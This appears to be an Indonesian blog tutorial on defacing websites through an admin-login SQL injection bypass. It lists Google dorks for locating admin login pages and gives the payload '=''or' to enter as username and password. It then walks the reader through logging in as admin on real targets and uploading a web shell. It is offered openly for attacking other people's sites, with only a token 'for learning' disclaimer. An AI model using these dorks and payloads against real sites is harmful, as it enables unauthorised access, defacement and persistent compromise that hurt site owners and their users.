Tutorial Deface Bypass Admin / Bypass SQL Login

Kali ini saya akan memberikan tutorial deface metode bypass admin. Metode ini memanfaatkan bug sql injection pada sebuah website, namun bug nya itu terdapat pada admin panel/admin login sebuah website.

Langsung saja

Dork :

• inurl /admin.php
• inurl /login.php
• inurl /admin/login.php
• inurl /administrator intext:admin login

  Pastekan di google
  Dork ini memang pasaran makanya, anda harus mengembangkan nya lagi. Apabila anda tidak tahu cara mengembangkannya anda bisa baca Belajar Dorking.Atau bisa lihat di Daftar Dork Bypass Admin

Exploit :
 username dan passwordnya di isi dengan query ini

'=''or' atau '=' 'or'

Jadi:
username : '=''or'
password : '=''or'

1. Dorking dengan dork di atas, lalu cari target, saya sudah punya life target. Maaf ya admin hanya sebagai pembelajaran.

 

2. Apabila anda sudah menemukan target anda isikan kolom username dan password dengan 

   '=''or' atau '=' 'or'

3. Apabila web target vuln maka anda akan masuk sebagai admin di website tersebut

4. Selesai terserah anda website nya mau diapakan, mau tanam shell ? use your brain. Tinggal Cari tempat upload, lalu upload shell kalian

happy hacking

SHARE THIS